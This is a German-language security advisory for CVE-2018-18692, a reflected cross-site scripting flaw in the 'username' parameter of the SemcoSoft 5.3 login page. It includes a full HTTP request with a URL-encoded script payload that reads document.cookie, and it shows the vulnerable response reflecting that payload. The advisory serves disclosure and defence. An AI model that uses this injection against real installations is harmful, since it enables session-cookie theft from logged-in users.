Cross-Site Scripting in Semcosoft (CVE-2018-18692)

Im Rahmen eines Penetrationstests wurde in der Semco-Software eine Cross-Site Scripting-Schwachstelle (XSS) gefunden, die es einem Angreifer ermöglichen würde, das „session cookie“ bzw. Sitzungscookie eines bereits angemeldeten Benutzers durch eine Cross-Site-Request-Forgery (CSRF) Attacke zu stehlen.

SEMCO steht für ein modernes Seminar- und Kursmanagement, das Mitarbeiter zeitsparend und effizient im Tagesgeschäft unterstützt. Einsatz findet es in betrieblichen Schulungen, Coachings, Seminaren jeglicher Art und im Bereich der internen Schulung.

Überblick

• Vendor: SEMCO Software Engineering GmbH
• Product: SemcoSoft
• Version: 5.3
• Vulnerability: Reflected Cross-Site Scripting

Issue Description

Reflected Cross-Site-Scripting (XSS) tritt auf, wenn ein Angreifer innerhalb einer einzigen HTTP response ausführbaren Code in den Browser einfügt. Der eingefügte Code wird jedoch nicht in der Anwendung gespeichert. Betroffen davon sind Benutzer, die einen schädlichen Link oder eine Website eines Dritten geöffnet haben. Der injizierte Code ist Teil eines URI- oder HTTP-Parameters, der von der Anwendung nicht ordnungsgemäß überprüft wurde und als unbedenklich an das Opfer zurückgegeben wurde. Durch einen solchen Angriff kann ein Angreifer vom Benutzer auf Informationen wie beispielsweise Sitzungscookies zugreifen. Im Falle der Semco-Software ist dies möglich, da der Parameter „username“ der HTTP-GET-Anforderung keiner Eingabevalidierung unterzogen wird.

HTTP-Request

GET/login?username=%22%3E%3C/span%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cspan%20id=%22username&_e=RvkztFgiQsQI%252FKXLsr48kh%252BgKeVU1jNeaLJ0NZLxQQpE6KO1No9MHbbxa%252Bygv1qv&password=&post=login&remove_duplicate_logins= HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

HTTP-Response

HTTP/1.1 200 OK
Date: Fri, 26 Oct 2018 14:21:48 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.6.36-1~dotdeb+7.1
Set-Cookie: PHPSESSID=tljhfircqdj32t7gj4q8vjk042; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6635
Connection: close
Content-Type: text/html; charset=utf-8

...[SNIP]...
<div><form id="loginform" class="inhaltform" style="margin: 0 0 200px 0;" action="/login?post=login" method="post" name="loginform"><input id="remove_duplicate_logins" name="remove_duplicate_logins" type="hidden" value="0" />
<fieldset>
<h3>Login</h3>
<div class="formzeile"><label>Benutzer</label>
<span class="textfeld"><input id="username" name="username" type="text" value="" /></span><script>alert(document.cookie)</script><span id="username"></span></div>
<div class="formzeile"><label>Passwort</label>
<span class="textfeld"><input id="password" name="password" type="password" value="" /></span></div></fieldset>
...[SNIP]...

Erläuterung

Penetration Testing ermöglicht das Erkennen von operative Risiken und liefert nützliche Entscheidungskriterien für die Auswahl effektiver sowie effizienter Schutzmaßnahmen. Es stellt also einen wesentlichen Baustein eines funktionsfähigen Sicherheitsprozesses dar und identifiziert, wie oben gezeigt, unbekannte und bekannte Schwachstellen, zeigt, inwieweit die IT-Infrastruktur den Compliance-Vorgaben entspricht. Folglich lässt sich die Sicherheit der IT-Systeme und Applikationen erhöhen und durch einen externen Dritten bestätigen.

Co-Autor

Pascal Keul

CVE

CVE-2018-18692

CVSSv3 Base Score

CVSS Base Score: 5.5

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N